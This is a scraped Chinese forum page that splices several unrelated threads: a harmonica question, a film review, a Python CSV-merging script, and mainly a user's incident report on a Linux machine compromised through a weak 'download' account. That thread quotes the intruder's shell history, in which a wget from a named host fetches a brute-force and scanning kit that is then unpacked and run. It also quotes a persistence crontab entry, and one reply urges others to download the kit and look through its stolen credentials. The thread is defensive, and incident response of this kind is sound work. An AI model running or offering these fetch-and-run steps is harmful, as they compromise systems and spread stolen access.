l*g
2 楼
☆─────────────────────────────────────☆
koder (koder) 于 (Fri May 15 06:37:19 2009) 提到:
想买个Hohner入门的复音口琴。才注意到音阶排列各不相同。我很多年前吹的
一只,音阶排列和自然音节非常接近,大概..12345617123456171..这样子。
请问那个Hohner金海洋是这样的吗?如果不是,什么型号是呢?准备请最近
过来的国内的朋友帮助带一个。谢谢。
☆─────────────────────────────────────☆
zudic (一只蛙) 于 (Fri May 15 23:24:52 2009) 提到:
我是吹十孔口琴的,对复音不了解。因为感兴趣,所以就查了一下。你习惯的那个音阶
类似半音阶口琴的音阶,适合吹奏旋律。不过似乎国内的大部分复音口琴都是一个适合
吹奏和弦的音阶排列。
如下转自中国口琴网:
一、复音口琴音阶排列类型
复音口琴音阶排列(以24孔复音口琴为例)大致分为三种类型。
一是合奏用复音口琴标准音阶排列,也就是所谓的“欧式音阶”排列。
如:|1|
koder (koder) 于 (Fri May 15 06:37:19 2009) 提到:
想买个Hohner入门的复音口琴。才注意到音阶排列各不相同。我很多年前吹的
一只,音阶排列和自然音节非常接近,大概..12345617123456171..这样子。
请问那个Hohner金海洋是这样的吗?如果不是,什么型号是呢?准备请最近
过来的国内的朋友帮助带一个。谢谢。
☆─────────────────────────────────────☆
zudic (一只蛙) 于 (Fri May 15 23:24:52 2009) 提到:
我是吹十孔口琴的,对复音不了解。因为感兴趣,所以就查了一下。你习惯的那个音阶
类似半音阶口琴的音阶,适合吹奏旋律。不过似乎国内的大部分复音口琴都是一个适合
吹奏和弦的音阶排列。
如下转自中国口琴网:
一、复音口琴音阶排列类型
复音口琴音阶排列(以24孔复音口琴为例)大致分为三种类型。
一是合奏用复音口琴标准音阶排列,也就是所谓的“欧式音阶”排列。
如:|1|
n*r
3 楼
【 以下文字转载自 LeisureTime 讨论区 】
发信人: neighbor (neighbor), 信区: LeisureTime
标 题: 五星级《万箭穿心》
发信站: BBS 未名空间站 (Wed Sep 4 22:05:55 2013, 美东)
五星级《万箭穿心》
Neighbor 于9/4/2013
2012《万箭穿心》是近年来少有的影片, 看了一遍, 想第二遍。影片在塑造人物上下
了很多功夫, 透着淡淡的女权主义味道, 让人不禁想到《芙蓉镇》。
90年代中期, 李宝莉(颜丙燕 饰)是一个武汉市井里的小人物, 小菜贩的女儿,自
己下岗也变成的买袜子小贩。丈夫马学武(焦刚 饰)是一家国企的厂办主任, 出生农
村, 但内里心高气傲。影片开始在马学武厂里分了新房,搬家前夜,李宝莉对未来的
生活无限憧憬,兴奋的睡不着,用脚一直钩着丈夫挑逗,马学武却表现冷淡。夫妻间的
一冷一热已为搬到新家的一系列不幸埋下伏笔。
丈夫对泼辣能干的小市民妻子已经失去了爱的能力。在李宝莉带着一头发卷,新家里再
次求爱后,马学武冷冷的丢了一句:“我们离婚吧!”。李宝莉之后反复利用儿子小宝
向丈夫示好,可是马学武俨然决心已下, 加上第三者周芬 (王沫溪 饰)的出现, 婚
姻已经名存实亡。
周芬是李宝莉的反面, 说话细声细气,打扮得体, 透着成熟少妇的风韵。 马学武讲
话的时候, 她用眼睛深情的注视, 哪怕是明显的喝酒吹牛, 她也专著用心聆听。 这
种近于崇拜的关切对感情饥渴的马学武是不可抗拒的。
李宝莉在旅馆门外听到丈夫和周芬偷情,周芬每一声娇羞的呻吟都变成刺向她的一把匕
首,使得她瘫坐在大街上。李宝莉怎么办?影片的独到之处是李宝莉迅速地克服了自己
破门而入的愤怒,在很短的时间一个计划已经形成。市井小民, 却工于心机, 用在湖
北人身上再恰当不过了。
在李宝莉的匿名举报下, 马学武和周芬被抓了卖淫嫖娼现行,厂办主任也丢了。李宝
莉大气地原谅了丈夫, 指望着丈夫的负罪感可以让她在挽救婚姻中斗争中占一点上风
。影片中实际上刻意把男性描绘成一个感情上的弱者,突出了男性感情上的天真和迷茫
。从李宝莉和好友小景(赵倩 饰)的对话中看出,马学武年轻时对李宝莉的追求是强
烈的。但影片中观众看到的更多的是他对李宝莉的排斥和厌恶。
马学武和周芬是影片刻意勾画的一个看点, 这是一段马学武自以为是的虚幻的爱情。
马学武和周芬偷情被抓后, 在一起吃热干面的场景,女的显得举重若轻, 男的诚惶诚
恐。周芬和主角李宝莉一样也是一个感情的驾驭者。假如马学武和周芬最后结合到一起
会怎样呢?周芬会不会变成另一个他厌烦的李宝莉呢?影片中的男性总体是幼稚和懦弱
的。
这更加反衬了李宝莉感情上的成熟和坚韧。无家可归的婆婆的突然来临, 她为了挽回
丈夫, 在小闹之后也选择了忍让。 可马学武在家庭和工作的双重压力下, 已经认命
选择了解脱。 得知妻子是造成他的一切不幸的告密者,只是压倒他的最后一根稻草。
李宝莉到底爱不爱丈夫呢? 这在丈夫寒酸的葬礼上给了答案, 对比婆婆和儿子小宝撕
心的哭声, 我们看到的李宝莉更多的是埋怨和怒其不争。原来她要挽回的婚姻只是一
个名分, 这也许连李宝莉自己都没有意识到。宝莉的好友小景把一切厄运归结于新房
的风水不好,楼下的马路四通八达,称之“万箭穿心”,个性倔强的李宝莉却不同意,
“万箭穿心”为什么不能是“万丈光芒”呢? 她放下架子,成为了一个收入颇高的扁
担工,直接挑起了婆婆和儿子小宝的重担。
影片在这里有一个十年的跳跃,成就了导演一个少有的批评社会的机会。李宝莉等社会
边缘人除了多了岁月的痕迹, 并没有乘上中国这辆全球最快的经济火车。 同样没赶上
车的是蹲了十年监狱的建建。建建大多用玩世不恭的市井气掩盖自己的失意,流氓身边
要有马子,李宝莉在一次半推半就的野和后,成了他重新进入社会的女人。相比和马学
武在一起,李宝莉和建建在一起到更显自然。
好景不长,李宝莉为了保护儿子小宝,用啤酒瓶打伤了建建。小宝因为失去爸爸对妈妈
一直嫉恨, 对妈妈多年的艰辛, 视而不见。李宝莉和建建在一起是小宝唾弃和无法理
解的。他偷偷见了父亲的老情人周芬, 证实了正是母亲“害”死了父亲。高考之后,
他要求断绝母子关系,逼着李宝莉离开这个家。
影片最激烈的一次冲突是李宝莉约小宝到屋顶, 怒气匆匆地冲上去给比自己高一头的
小宝一个大嘴巴。一副老娘教育儿子的凶相。小宝伤心的说出了心里的秘密, 从一个
孩子的眼里母亲“害”死了父亲是不可原谅的。看到这个时候, 我很怕电影大打亲情
牌,落入母子和好的俗套。
感谢导演王竟和编剧吴楠,影片从此进入了一个平静的高潮。小宝的陈述钩起了李宝莉
对过去不幸的回忆, 她一个人跑到江边独坐。夜已深了, 一片漆黑,我们看不到李宝
莉对自己的自责, 也看不出她对小宝不敬的原谅。更多的是对命运的无奈和抗争, 这
抗争在黑暗中渐渐坚定。 当早晨的太阳再次照到李宝莉脸上时,我们看到的是那个独
有的波澜不惊的微笑。
没有吵闹,李宝莉静静的收拾东西,挑扁担搬走了。 这个女人遭遇了这么多不幸, 本
应“万箭穿心”, 可和片中男人不同, 她没有选择解脱, 也不把自己的不幸推托给
别人,坚定地和命运抗争。
如果要一定吹毛求疵,影片的结尾是有改变的空间的。建建的出现显得有些画蛇添足,
就让李宝莉一个挑着扁担走到热闹的汉正街上好了, 然后融在漫漫的人群中。
演员的演技就不用多说了。 但觉得颜丙燕不如刘晓庆幸运。 刘靠《芙蓉镇》上了一个
台阶, 在中国那个时代, 无出其右。颜在这个物质浮躁的时代, 静下心来塑造了李
宝莉,希望一年后人们还记得她。对于我来说, 那个身边竖着扁担的漂亮女人是永远
不会磨灭的。
Neighbor 于9/4/2013
发信人: neighbor (neighbor), 信区: LeisureTime
标 题: 五星级《万箭穿心》
发信站: BBS 未名空间站 (Wed Sep 4 22:05:55 2013, 美东)
五星级《万箭穿心》
Neighbor 于9/4/2013
2012《万箭穿心》是近年来少有的影片, 看了一遍, 想第二遍。影片在塑造人物上下
了很多功夫, 透着淡淡的女权主义味道, 让人不禁想到《芙蓉镇》。
90年代中期, 李宝莉(颜丙燕 饰)是一个武汉市井里的小人物, 小菜贩的女儿,自
己下岗也变成的买袜子小贩。丈夫马学武(焦刚 饰)是一家国企的厂办主任, 出生农
村, 但内里心高气傲。影片开始在马学武厂里分了新房,搬家前夜,李宝莉对未来的
生活无限憧憬,兴奋的睡不着,用脚一直钩着丈夫挑逗,马学武却表现冷淡。夫妻间的
一冷一热已为搬到新家的一系列不幸埋下伏笔。
丈夫对泼辣能干的小市民妻子已经失去了爱的能力。在李宝莉带着一头发卷,新家里再
次求爱后,马学武冷冷的丢了一句:“我们离婚吧!”。李宝莉之后反复利用儿子小宝
向丈夫示好,可是马学武俨然决心已下, 加上第三者周芬 (王沫溪 饰)的出现, 婚
姻已经名存实亡。
周芬是李宝莉的反面, 说话细声细气,打扮得体, 透着成熟少妇的风韵。 马学武讲
话的时候, 她用眼睛深情的注视, 哪怕是明显的喝酒吹牛, 她也专著用心聆听。 这
种近于崇拜的关切对感情饥渴的马学武是不可抗拒的。
李宝莉在旅馆门外听到丈夫和周芬偷情,周芬每一声娇羞的呻吟都变成刺向她的一把匕
首,使得她瘫坐在大街上。李宝莉怎么办?影片的独到之处是李宝莉迅速地克服了自己
破门而入的愤怒,在很短的时间一个计划已经形成。市井小民, 却工于心机, 用在湖
北人身上再恰当不过了。
在李宝莉的匿名举报下, 马学武和周芬被抓了卖淫嫖娼现行,厂办主任也丢了。李宝
莉大气地原谅了丈夫, 指望着丈夫的负罪感可以让她在挽救婚姻中斗争中占一点上风
。影片中实际上刻意把男性描绘成一个感情上的弱者,突出了男性感情上的天真和迷茫
。从李宝莉和好友小景(赵倩 饰)的对话中看出,马学武年轻时对李宝莉的追求是强
烈的。但影片中观众看到的更多的是他对李宝莉的排斥和厌恶。
马学武和周芬是影片刻意勾画的一个看点, 这是一段马学武自以为是的虚幻的爱情。
马学武和周芬偷情被抓后, 在一起吃热干面的场景,女的显得举重若轻, 男的诚惶诚
恐。周芬和主角李宝莉一样也是一个感情的驾驭者。假如马学武和周芬最后结合到一起
会怎样呢?周芬会不会变成另一个他厌烦的李宝莉呢?影片中的男性总体是幼稚和懦弱
的。
这更加反衬了李宝莉感情上的成熟和坚韧。无家可归的婆婆的突然来临, 她为了挽回
丈夫, 在小闹之后也选择了忍让。 可马学武在家庭和工作的双重压力下, 已经认命
选择了解脱。 得知妻子是造成他的一切不幸的告密者,只是压倒他的最后一根稻草。
李宝莉到底爱不爱丈夫呢? 这在丈夫寒酸的葬礼上给了答案, 对比婆婆和儿子小宝撕
心的哭声, 我们看到的李宝莉更多的是埋怨和怒其不争。原来她要挽回的婚姻只是一
个名分, 这也许连李宝莉自己都没有意识到。宝莉的好友小景把一切厄运归结于新房
的风水不好,楼下的马路四通八达,称之“万箭穿心”,个性倔强的李宝莉却不同意,
“万箭穿心”为什么不能是“万丈光芒”呢? 她放下架子,成为了一个收入颇高的扁
担工,直接挑起了婆婆和儿子小宝的重担。
影片在这里有一个十年的跳跃,成就了导演一个少有的批评社会的机会。李宝莉等社会
边缘人除了多了岁月的痕迹, 并没有乘上中国这辆全球最快的经济火车。 同样没赶上
车的是蹲了十年监狱的建建。建建大多用玩世不恭的市井气掩盖自己的失意,流氓身边
要有马子,李宝莉在一次半推半就的野和后,成了他重新进入社会的女人。相比和马学
武在一起,李宝莉和建建在一起到更显自然。
好景不长,李宝莉为了保护儿子小宝,用啤酒瓶打伤了建建。小宝因为失去爸爸对妈妈
一直嫉恨, 对妈妈多年的艰辛, 视而不见。李宝莉和建建在一起是小宝唾弃和无法理
解的。他偷偷见了父亲的老情人周芬, 证实了正是母亲“害”死了父亲。高考之后,
他要求断绝母子关系,逼着李宝莉离开这个家。
影片最激烈的一次冲突是李宝莉约小宝到屋顶, 怒气匆匆地冲上去给比自己高一头的
小宝一个大嘴巴。一副老娘教育儿子的凶相。小宝伤心的说出了心里的秘密, 从一个
孩子的眼里母亲“害”死了父亲是不可原谅的。看到这个时候, 我很怕电影大打亲情
牌,落入母子和好的俗套。
感谢导演王竟和编剧吴楠,影片从此进入了一个平静的高潮。小宝的陈述钩起了李宝莉
对过去不幸的回忆, 她一个人跑到江边独坐。夜已深了, 一片漆黑,我们看不到李宝
莉对自己的自责, 也看不出她对小宝不敬的原谅。更多的是对命运的无奈和抗争, 这
抗争在黑暗中渐渐坚定。 当早晨的太阳再次照到李宝莉脸上时,我们看到的是那个独
有的波澜不惊的微笑。
没有吵闹,李宝莉静静的收拾东西,挑扁担搬走了。 这个女人遭遇了这么多不幸, 本
应“万箭穿心”, 可和片中男人不同, 她没有选择解脱, 也不把自己的不幸推托给
别人,坚定地和命运抗争。
如果要一定吹毛求疵,影片的结尾是有改变的空间的。建建的出现显得有些画蛇添足,
就让李宝莉一个挑着扁担走到热闹的汉正街上好了, 然后融在漫漫的人群中。
演员的演技就不用多说了。 但觉得颜丙燕不如刘晓庆幸运。 刘靠《芙蓉镇》上了一个
台阶, 在中国那个时代, 无出其右。颜在这个物质浮躁的时代, 静下心来塑造了李
宝莉,希望一年后人们还记得她。对于我来说, 那个身边竖着扁担的漂亮女人是永远
不会磨灭的。
Neighbor 于9/4/2013
s*n
4 楼
我的程序目的是把一个文件夹里面所有的csv file(4 columns each with same
variables)合并成一个文件。 总是得到IndexError: list index out of range
下面是我的程序:
import csv
import os
##this path is the location where raw data are stored
path = "C:/Users/Project/Python code/practice1/csv"
dirList=os.listdir(path)
##this fname is the output file name
fname = "C:/Users/Project/Python code/practice1/Combined file/combined.csv"
nfile = open(fname,'wb')
writer = csv.writer(nfile)
start = 0
for fn in dirList:
##this fullfn is the path for raw data plus file name
fullfn = "C:/Users/Project/Python code/practice1/csv/" + fn
reader = csv.reader(open(fullfn),delimiter=',')
cnt = 0
for column in reader:
if(start==0):
b=[column[0], column[1],column[2],column[3]]
writer = csv.writer(open(fullfn, 'w', newline=''), delimiter=',')
writer.writerow(b)
cnt = 1
start = 1
else:
if(cnt==0):
cnt = 1
continue
else:
b=[column[0], column[1],column[2],column[3]]
writer = csv.writer(open(fullfn, 'w', newline=''),
delimiter=',')
writer.writerow(b)
cnt = cnt + 1
nfile.close()
variables)合并成一个文件。 总是得到IndexError: list index out of range
下面是我的程序:
import csv
import os
##this path is the location where raw data are stored
path = "C:/Users/Project/Python code/practice1/csv"
dirList=os.listdir(path)
##this fname is the output file name
fname = "C:/Users/Project/Python code/practice1/Combined file/combined.csv"
nfile = open(fname,'wb')
writer = csv.writer(nfile)
start = 0
for fn in dirList:
##this fullfn is the path for raw data plus file name
fullfn = "C:/Users/Project/Python code/practice1/csv/" + fn
reader = csv.reader(open(fullfn),delimiter=',')
cnt = 0
for column in reader:
if(start==0):
b=[column[0], column[1],column[2],column[3]]
writer = csv.writer(open(fullfn, 'w', newline=''), delimiter=',')
writer.writerow(b)
cnt = 1
start = 1
else:
if(cnt==0):
cnt = 1
continue
else:
b=[column[0], column[1],column[2],column[3]]
writer = csv.writer(open(fullfn, 'w', newline=''),
delimiter=',')
writer.writerow(b)
cnt = cnt + 1
nfile.close()
A*s
5 楼
家里的其中一台电脑之前开了一个download用户,估计是被对方猜到密码了
bash的history:
uname -a
cat /proc/cpuinfo
ps x
passwd
cd /var/tmp
ls -a
wget freewebtown.com/arapa/as.tgz
tar zxvf as.tgz
rm -rf as.tgz
cd as
rm -rf vuln.txt
touch vuln.txt
chmod +x *
screen
现在的问题是怎么才能看到screen的history,我不知道他在这里做过什么,突然好害
怕…
另外有人知道as这个是干嘛的吗?
$find as
as
as/scan.log
as/nobash.txt
as/a
as/pass.txt
as/sshd
as/start
as/screen
as/pscan2
as/vuln.txt
bash的history:
uname -a
cat /proc/cpuinfo
ps x
passwd
cd /var/tmp
ls -a
wget freewebtown.com/arapa/as.tgz
tar zxvf as.tgz
rm -rf as.tgz
cd as
rm -rf vuln.txt
touch vuln.txt
chmod +x *
screen
现在的问题是怎么才能看到screen的history,我不知道他在这里做过什么,突然好害
怕…
另外有人知道as这个是干嘛的吗?
$find as
as
as/scan.log
as/nobash.txt
as/a
as/pass.txt
as/sshd
as/start
as/screen
as/pscan2
as/vuln.txt
H*S
6 楼
3个小时之内不出来,那就是等明天了
s*n
7 楼
我改好了,现在正常了。 贴出来分享:
import csv
import os
##this path is the location where raw data are stored
path = "C:/Users/Documents/Project/Python code/practice1/csv"
dirList=os.listdir(path)
##this fname is the output file name
fname = "C:/Users/Documents/Project/Python code/practice1/Combined file/
combined.csv"
nfile = open(fname,'w', newline='')
writer = csv.writer(nfile)
start = 0
for fn in dirList:
##this fullfn is the path for raw data plus file name
fullfn = "C:/Users/Documents/Project/Python code/practice1/csv/" + fn
reader = csv.reader(open(fullfn),delimiter=',')
cnt = 0
for r in reader:
if(start==0):
b=[r[0],r[1],r[2],r[3]]
print(b)
writer.writerow(b)
cnt = 1
start = 1
else:
if(cnt==0):
cnt = 1
continue
else:
b=[r[0],r[1],r[2],r[3]]
print (b)
writer.writerow(b)
cnt = cnt + 1
nfile.close()
import csv
import os
##this path is the location where raw data are stored
path = "C:/Users/Documents/Project/Python code/practice1/csv"
dirList=os.listdir(path)
##this fname is the output file name
fname = "C:/Users/Documents/Project/Python code/practice1/Combined file/
combined.csv"
nfile = open(fname,'w', newline='')
writer = csv.writer(nfile)
start = 0
for fn in dirList:
##this fullfn is the path for raw data plus file name
fullfn = "C:/Users/Documents/Project/Python code/practice1/csv/" + fn
reader = csv.reader(open(fullfn),delimiter=',')
cnt = 0
for r in reader:
if(start==0):
b=[r[0],r[1],r[2],r[3]]
print(b)
writer.writerow(b)
cnt = 1
start = 1
else:
if(cnt==0):
cnt = 1
continue
else:
b=[r[0],r[1],r[2],r[3]]
print (b)
writer.writerow(b)
cnt = cnt + 1
nfile.close()
s*r
11 楼
早来早走。在等一会。
l*g
14 楼
It's just try to scan your system for possible break points. :)
maybe more can be found from the screen history.
but your system may be compromised.
【在 A*******s 的大作中提到】
: 22端口开了port forward……
: 发现it至少从今天早上就进来了
: 丫的兰州大学
: Hostname: 202.201.13.98
: ISP: China Education and Research Network
: Organization: Lanzhou University
: Proxy: None detected
: Type: Cable/DSL
maybe more can be found from the screen history.
but your system may be compromised.
【在 A*******s 的大作中提到】
: 22端口开了port forward……
: 发现it至少从今天早上就进来了
: 丫的兰州大学
: Hostname: 202.201.13.98
: ISP: China Education and Research Network
: Organization: Lanzhou University
: Proxy: None detected
: Type: Cable/DSL
H*s
17 楼
什么呀。 医学 有关的 很多 上下班很早。 我 和 一个 搞医的 早上 5点CARPOOL
过。
过。
h*k
19 楼
怎么这次大家这么high?
z*n
21 楼
你,sudo crontab -l -u download
看看你的download user有啥crontab在run
估计就是那个兰州小孩装了个crontab在运行什么东东
那个as,谁知道是啥的,你自己wget那个网址那个文件打开看看就知道了
呵呵
如果你的download user没啥权限说不定也没啥大不了的
貌似他想在你的download user地下起一个chroot小系统
看完了把download user删除了吧
userdel -r download
for
for
【在 A*******s 的大作中提到】
: 我一个爱国青年能做什么坏事……
: 再请教一下:
: /var/auth.log
: Jul 19 22:18:01 alex CRON[26507]: pam_unix(cron:session): session opened for
: user download by (uid=0)
: Jul 19 22:18:01 alex CRON[26507]: pam_unix(cron:session): session closed for
: user download
: CRON这里是什么意思?
看看你的download user有啥crontab在run
估计就是那个兰州小孩装了个crontab在运行什么东东
那个as,谁知道是啥的,你自己wget那个网址那个文件打开看看就知道了
呵呵
如果你的download user没啥权限说不定也没啥大不了的
貌似他想在你的download user地下起一个chroot小系统
看完了把download user删除了吧
userdel -r download
for
for
【在 A*******s 的大作中提到】
: 我一个爱国青年能做什么坏事……
: 再请教一下:
: /var/auth.log
: Jul 19 22:18:01 alex CRON[26507]: pam_unix(cron:session): session opened for
: user download by (uid=0)
: Jul 19 22:18:01 alex CRON[26507]: pam_unix(cron:session): session closed for
: user download
: CRON这里是什么意思?
z*n
22 楼
有点意思
freewebtown.com/arapa/as.tgz
你自己下载下来看看吧,呵呵
【在 z*********n 的大作中提到】
: 你,sudo crontab -l -u download
: 看看你的download user有啥crontab在run
: 估计就是那个兰州小孩装了个crontab在运行什么东东
: 那个as,谁知道是啥的,你自己wget那个网址那个文件打开看看就知道了
: 呵呵
: 如果你的download user没啥权限说不定也没啥大不了的
: 貌似他想在你的download user地下起一个chroot小系统
: 看完了把download user删除了吧
: userdel -r download
:
freewebtown.com/arapa/as.tgz
你自己下载下来看看吧,呵呵
【在 z*********n 的大作中提到】
: 你,sudo crontab -l -u download
: 看看你的download user有啥crontab在run
: 估计就是那个兰州小孩装了个crontab在运行什么东东
: 那个as,谁知道是啥的,你自己wget那个网址那个文件打开看看就知道了
: 呵呵
: 如果你的download user没啥权限说不定也没啥大不了的
: 貌似他想在你的download user地下起一个chroot小系统
: 看完了把download user删除了吧
: userdel -r download
:
A*s
27 楼
我发现以后第一时间已经kill掉所有download的进程,然后把/etc/passwd里面
downlowd的shell设成false
还有什么地方需要看得吗?我就怕他留了什么后门在我这里,大不了我就重装一下系统
了……因为我看到这里http://ubuntuforums.org/archive/index.php/t-253373.html说
You really should boot of a live CD. You can't analyse your system unless
you know you can trust the binaries you are using. The guest account has
logged in from a couple of addresses today already, you have been cracked
and you can't trust your system anymore. You must boot off of a live cd and
then start inspecting init,
【在 z*********n 的大作中提到】
: 你,sudo crontab -l -u download
: 看看你的download user有啥crontab在run
: 估计就是那个兰州小孩装了个crontab在运行什么东东
: 那个as,谁知道是啥的,你自己wget那个网址那个文件打开看看就知道了
: 呵呵
: 如果你的download user没啥权限说不定也没啥大不了的
: 貌似他想在你的download user地下起一个chroot小系统
: 看完了把download user删除了吧
: userdel -r download
:
downlowd的shell设成false
还有什么地方需要看得吗?我就怕他留了什么后门在我这里,大不了我就重装一下系统
了……因为我看到这里http://ubuntuforums.org/archive/index.php/t-253373.html说
You really should boot of a live CD. You can't analyse your system unless
you know you can trust the binaries you are using. The guest account has
logged in from a couple of addresses today already, you have been cracked
and you can't trust your system anymore. You must boot off of a live cd and
then start inspecting init,
【在 z*********n 的大作中提到】
: 你,sudo crontab -l -u download
: 看看你的download user有啥crontab在run
: 估计就是那个兰州小孩装了个crontab在运行什么东东
: 那个as,谁知道是啥的,你自己wget那个网址那个文件打开看看就知道了
: 呵呵
: 如果你的download user没啥权限说不定也没啥大不了的
: 貌似他想在你的download user地下起一个chroot小系统
: 看完了把download user删除了吧
: userdel -r download
:
A*s
29 楼
$ sudo crontab -l -u download
* * * * * /home/download/ /. /.logan/update >/dev/null 2>&1
这个啥意思?
【在 z*********n 的大作中提到】
: 你,sudo crontab -l -u download
: 看看你的download user有啥crontab在run
: 估计就是那个兰州小孩装了个crontab在运行什么东东
: 那个as,谁知道是啥的,你自己wget那个网址那个文件打开看看就知道了
: 呵呵
: 如果你的download user没啥权限说不定也没啥大不了的
: 貌似他想在你的download user地下起一个chroot小系统
: 看完了把download user删除了吧
: userdel -r download
:
* * * * * /home/download/ /. /.logan/update >/dev/null 2>&1
这个啥意思?
【在 z*********n 的大作中提到】
: 你,sudo crontab -l -u download
: 看看你的download user有啥crontab在run
: 估计就是那个兰州小孩装了个crontab在运行什么东东
: 那个as,谁知道是啥的,你自己wget那个网址那个文件打开看看就知道了
: 呵呵
: 如果你的download user没啥权限说不定也没啥大不了的
: 貌似他想在你的download user地下起一个chroot小系统
: 看完了把download user删除了吧
: userdel -r download
:
A*s
37 楼
没有啦,系统目录里面根本没有logan这个字符串
[email protected]:/# find / -name "*logan*"
[email protected]:/# find / -user download
/var/run/screen/S-download
/home/download
/home/download/.bash_history
/home/download/.bash_logout
/home/download/.bashrc
/home/download/.profile
/home/download/.ssh
/home/download/.ssh/known_hosts
【在 z*********n 的大作中提到】
: 我估计放在/home/download/.logan底下了
: user level guest os不是新鲜事
[email protected]:/# find / -name "*logan*"
[email protected]:/# find / -user download
/var/run/screen/S-download
/home/download
/home/download/.bash_history
/home/download/.bash_logout
/home/download/.bashrc
/home/download/.profile
/home/download/.ssh
/home/download/.ssh/known_hosts
【在 z*********n 的大作中提到】
: 我估计放在/home/download/.logan底下了
: user level guest os不是新鲜事
z*n
38 楼
你有没有进到那个screen session里边看看在运行啥
【在 A*******s 的大作中提到】
: 没有啦,系统目录里面根本没有logan这个字符串
: [email protected]:/# find / -name "*logan*"
: [email protected]:/# find / -user download
: /var/run/screen/S-download
: /home/download
: /home/download/.bash_history
: /home/download/.bash_logout
: /home/download/.bashrc
: /home/download/.profile
: /home/download/.ssh
【在 A*******s 的大作中提到】
: 没有啦,系统目录里面根本没有logan这个字符串
: [email protected]:/# find / -name "*logan*"
: [email protected]:/# find / -user download
: /var/run/screen/S-download
: /home/download
: /home/download/.bash_history
: /home/download/.bash_logout
: /home/download/.bashrc
: /home/download/.profile
: /home/download/.ssh
A*s
40 楼
我试着(用download帐号)运行it下载那个包里面的screen,提示
./screen: error while loading shared libraries: libutempter.so.0: cannot
open shared object file: No such file or directory
我再用download帐号运行系统的screen,提示
Cannot open your terminal '/dev/pts/1' - please check.
这个貌似是/dev/pts/1权限设置的问题,我觉得it不可能改动。
[email protected]:/var/tmp/as$ ls -l /dev/pts/
total 0
crw------- 1 xxx tty 136, 0 2009-07-20 01:46 0
crw------- 1 xxx tty 136, 1 2009-07-20 01:53 1
看bash history,他是想运行系统的screen,那是不是说他也没成功把screen打开呢?
./screen: error while loading shared libraries: libutempter.so.0: cannot
open shared object file: No such file or directory
我再用download帐号运行系统的screen,提示
Cannot open your terminal '/dev/pts/1' - please check.
这个貌似是/dev/pts/1权限设置的问题,我觉得it不可能改动。
[email protected]:/var/tmp/as$ ls -l /dev/pts/
total 0
crw------- 1 xxx tty 136, 0 2009-07-20 01:46 0
crw------- 1 xxx tty 136, 1 2009-07-20 01:53 1
看bash history,他是想运行系统的screen,那是不是说他也没成功把screen打开呢?
z*n
41 楼
根据你一楼的帖子,他运行的是系统screen
所以肯定然后在screen里边做了一些事情的
你看那个bash history里,是screen
没有path,调用的一定是系统的screen
你刚才还列出一个/var/run/screen/S-download
这个就是证明screen在download用户下在运行
不知道是还在运行,还是被你kill -9后那个文件没杀掉
你确定现在没有screen process在运行了?
【在 A*******s 的大作中提到】
: 我试着(用download帐号)运行it下载那个包里面的screen,提示
: ./screen: error while loading shared libraries: libutempter.so.0: cannot
: open shared object file: No such file or directory
: 我再用download帐号运行系统的screen,提示
: Cannot open your terminal '/dev/pts/1' - please check.
: 这个貌似是/dev/pts/1权限设置的问题,我觉得it不可能改动。
: [email protected]:/var/tmp/as$ ls -l /dev/pts/
: total 0
: crw------- 1 xxx tty 136, 0 2009-07-20 01:46 0
: crw------- 1 xxx tty 136, 1 2009-07-20 01:53 1
所以肯定然后在screen里边做了一些事情的
你看那个bash history里,是screen
没有path,调用的一定是系统的screen
你刚才还列出一个/var/run/screen/S-download
这个就是证明screen在download用户下在运行
不知道是还在运行,还是被你kill -9后那个文件没杀掉
你确定现在没有screen process在运行了?
【在 A*******s 的大作中提到】
: 我试着(用download帐号)运行it下载那个包里面的screen,提示
: ./screen: error while loading shared libraries: libutempter.so.0: cannot
: open shared object file: No such file or directory
: 我再用download帐号运行系统的screen,提示
: Cannot open your terminal '/dev/pts/1' - please check.
: 这个貌似是/dev/pts/1权限设置的问题,我觉得it不可能改动。
: [email protected]:/var/tmp/as$ ls -l /dev/pts/
: total 0
: crw------- 1 xxx tty 136, 0 2009-07-20 01:46 0
: crw------- 1 xxx tty 136, 1 2009-07-20 01:53 1
A*s
42 楼
[email protected]:~# ps aux |grep screen
root 4801 0.0 0.1 3112 724 pts/0 S+ 02:08 0:00 grep screen
现在又可以从download运行系统的screen…真奇怪。
不过我试了一下,/var/run/screen 下面那个文件夹只要运行过一次screen就会一直存
在的,貌似
如果screen被kill了,那么S-download/里面会留下一个socket
如果screen是exit的,那么S-download/就会被清空,包括之前kill留下的socket
【在 z*********n 的大作中提到】
: 根据你一楼的帖子,他运行的是系统screen
: 所以肯定然后在screen里边做了一些事情的
: 你看那个bash history里,是screen
: 没有path,调用的一定是系统的screen
: 你刚才还列出一个/var/run/screen/S-download
: 这个就是证明screen在download用户下在运行
: 不知道是还在运行,还是被你kill -9后那个文件没杀掉
: 你确定现在没有screen process在运行了?
root 4801 0.0 0.1 3112 724 pts/0 S+ 02:08 0:00 grep screen
现在又可以从download运行系统的screen…真奇怪。
不过我试了一下,/var/run/screen 下面那个文件夹只要运行过一次screen就会一直存
在的,貌似
如果screen被kill了,那么S-download/里面会留下一个socket
如果screen是exit的,那么S-download/就会被清空,包括之前kill留下的socket
【在 z*********n 的大作中提到】
: 根据你一楼的帖子,他运行的是系统screen
: 所以肯定然后在screen里边做了一些事情的
: 你看那个bash history里,是screen
: 没有path,调用的一定是系统的screen
: 你刚才还列出一个/var/run/screen/S-download
: 这个就是证明screen在download用户下在运行
: 不知道是还在运行,还是被你kill -9后那个文件没杀掉
: 你确定现在没有screen process在运行了?
L*s
44 楼
你就是个肉鸡罢了...
Z*0
45 楼
大家下载那个文件,打开看看。里边有很多肉机的密码和IP。里边有个这个东西:
WZD's hacked servers。 :)。
这个是个后门程序,自带sshd,screen, start, pscan2. 看起来主要用来扫描机器,
破解秘密用的。
【在 A*******s 的大作中提到】
: 家里的其中一台电脑之前开了一个download用户,估计是被对方猜到密码了
: bash的history:
: uname -a
: cat /proc/cpuinfo
: ps x
: passwd
: cd /var/tmp
: ls -a
: wget freewebtown.com/arapa/as.tgz
: tar zxvf as.tgz
WZD's hacked servers。 :)。
这个是个后门程序,自带sshd,screen, start, pscan2. 看起来主要用来扫描机器,
破解秘密用的。
【在 A*******s 的大作中提到】
: 家里的其中一台电脑之前开了一个download用户,估计是被对方猜到密码了
: bash的history:
: uname -a
: cat /proc/cpuinfo
: ps x
: passwd
: cd /var/tmp
: ls -a
: wget freewebtown.com/arapa/as.tgz
: tar zxvf as.tgz
c*0
61 楼
呵呵,这个程序是用 密码字典 试出的download密码。看看那个pass.txt文件,只有
download只有一个字典项,
$ cat pass.txt | grep download
download download
结果lz就中招了。
download只有一个字典项,
$ cat pass.txt | grep download
download download
